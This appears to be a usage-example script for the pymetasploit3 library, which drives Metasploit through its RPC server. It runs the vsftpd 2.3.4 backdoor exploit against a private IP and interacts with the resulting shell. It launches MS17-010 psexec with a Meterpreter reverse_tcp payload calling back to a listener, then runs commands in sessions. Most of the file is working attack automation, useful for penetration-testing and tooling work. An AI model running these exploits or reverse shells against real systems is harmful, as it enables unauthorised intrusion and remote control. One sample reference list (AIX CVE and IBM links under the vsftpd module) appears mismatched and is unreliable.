example_usage.py
from pymetasploit3.msfrpc import MsfRpcClient
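## Usage example
#
# Walk-through of the pymetasploit3 API against a running msfrpcd.
# Every statement below is a remote call to the RPC server, so the script is
# only meaningful with a reachable, authenticated msfrpcd instance.

# Connect to the RPC server.
# NOTE: 'mypassword' is the placeholder from the original example. In a real
# deployment read the RPC password from the environment or a secrets store
# rather than committing it to source, and confirm that the transport keyword
# arguments (server/port/ssl) match how msfrpcd was started -- TODO confirm
# the client's defaults before relying on them.
client = MsfRpcClient('mypassword')

# Get an exploit object
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')

# Set the exploit options.
# The module reports RHOSTS (not RHOST) as its required target option -- see
# `exploit.required` / `exploit.missing_required` further below -- so setting
# RHOST would leave the required option unset.
exploit['RHOSTS'] = "192.168.115.80"
exploit['RPORT'] = "21"

# Execute the exploit, success will return a jobid
exploit.execute(payload="cmd/unix/interact")

# Find all available sessions.
# `client.sessions.list` presumably queries the server on each access; read it
# once so the listing and the lookup below operate on the same snapshot.
sessions = client.sessions.list
print("Available sessions: ")
for session_id in sessions:
    print(session_id)

# Get a shell object -- only when a session actually exists. Indexing the
# first key of an empty mapping would raise IndexError whenever the exploit
# produced no session.
if sessions:
    first_session_id = next(iter(sessions))
    shell = client.sessions.session(first_session_id)
    # Write to the shell
    shell.write('whoami')
    # Print the output
    print(shell.read())
    # Stop the shell
    shell.stop()
else:
    print("No session was created.")

## Console
# Create a console and keep a handle on it; the server assigns the ID.
console = client.consoles.console()
cid = console.cid
# >>> "1"
# Write to console
console.write('show options')
# Read from console
console.read()
# >>> {'data': 'Global Options:\n===============\n\n Option...'
# 'prompt': '\x01\x02msf5\x01\x02 \x01\x02> ',
# 'busy': False}
# Check if console is busy
console.is_busy()
# >>> False
# Destroy the console once finished. destroy() must be *called* -- a bare
# `.destroy` attribute reference does nothing -- and the console manager is
# `client.consoles`; destroying the console before the write/read calls above
# would make them target a console that no longer exists.
console.destroy()

## Modules
# List exploit modules
client.modules.exploits
# >>> ['aix/local/ibstat_path',
# 'aix/rpc_cmsd_opcode21',
# 'aix/rpc_ttdbserverd_realpath',
# ...]
# Use a module
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
# Set module options (RHOSTS is the option name the module reports as required)
exploit['RHOSTS'] = "192.168.115.80"
exploit['RPORT'] = "21"
# Get required options
exploit.required
# >>> ['RHOSTS', 'RPORT', 'SSLVersion', 'ConnectTimeout']
# Get required options that haven't been set yet
exploit.missing_required
# >>> ['RHOSTS']
# See all the options which have been set
exploit.runoptions
# >>> {'VERBOSE': False,
# 'WfsDelay': 0,
# 'EnableContextEncoding': False,
# 'DisablePayloadHandler': False,
# 'RPORT': 21,
# 'SSL': False,
# 'SSLVersion': 'Auto',
# 'SSLVerifyMode': 'PEER',
# 'ConnectTimeout': 10,
# 'TCP::max_send_size': 0,
# 'TCP::send_delay': 0}
# Get the CVE/OSVDB/BID of an exploit
exploit.references
# >>> [['CVE', '2013-4011'],
# ['OSVDB', '95420'],
# ['BID', '61287'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
# ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']]
# Get an option's info
exploit.optioninfo('RHOSTS')
# >>> {'type': 'addressrange',
# 'required': True,
# 'advanced': False,
# 'evasion': False,
# 'desc': 'The target address range or CIDR identifier'}
# Get targets
exploit.targets
# >>> {0: 'Automatic'}
# Set the target
exploit.target = 0
# Get target-compatible payloads
exploit.targetpayloads()
# >>> ['cmd/unix/interact']
# Execute the module
# If 'job_id' is None, the module failed to execute
exploit.execute(payload='cmd/unix/interact')
# >>> {'job_id': 1, 'uuid': 'hb2f0yei'}
# Execute the module and return the output.
# A dedicated console is created for the run and destroyed afterwards so the
# example does not leak consoles on the server.
output_console = client.consoles.console()
output_console.run_module_with_output(exploit, payload='cmd/unix/interact')
# >>> '... [-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused \
# The connection was refused by the remote host (127.0.0.1:21).\n[*] Exploit completed, but no session was created.\n'
output_console.destroy()

## Sessions
# The '1' below stands for a session ID as returned by `client.sessions.list`;
# substitute an ID that actually exists on your server.
# Get all sessions
client.sessions.list
# >>> {'1': {'type': 'meterpreter',
# 'tunnel_local': '192.168.1.2:4444',
# [...]
# 'platform': 'windows'}}
# Get a session's info
client.sessions.session('1').info
# Write to a session
client.sessions.session('1').write('help')
# Read a session
client.sessions.session('1').read()
# >>> '\nCore Commands\n=============\n\n Command Description\n ------- [...]'
# Run a command and wait for the output
client.sessions.session('1').run_with_output('arp')
# >>> '\nArp stuff'
# Run a shell command within a meterpreter session
client.sessions.session('1').run_shell_cmd_with_output('whoami')

# How to set Payload Options
# Some exploits need to set payload options, here's an example on how to do so
exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
# create a payload object as normal
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
# add payload specific options
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
# Execute the exploit with the linked payload, success will return a jobid
exploit.execute(payload=payload)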